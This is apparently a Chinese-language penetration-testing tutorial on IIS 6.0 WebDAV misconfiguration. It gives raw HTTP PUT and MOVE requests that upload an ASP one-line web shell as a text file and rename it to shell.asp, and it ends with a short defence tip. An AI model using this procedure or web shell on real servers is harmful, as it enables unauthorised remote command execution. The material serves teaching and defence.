常见的的web中间件有iis apache tomcat nginx jboss Weblogic WebSphere,如果配置不当也会造成漏洞,下面举出几个常见的容器漏洞
iis6.0 put的上传 IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。
用burpsuite 提交OPTIONS 查看支持的协议
put写入一句话,但是不能直接写入脚本文件先写个txt文件再通过move方法改写成asp文件
PUT /test.txt HTTP/1.1
Host: upload.moonteam.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 27
<%eval request(“cmd”)%>
成功写入
MOVE /test.txt HTTP/1.1
Host: upload.moonteam.com
Destination: http://upload.moonteam.com/shell.asp
防御方案:关掉webDAV 关闭写入权限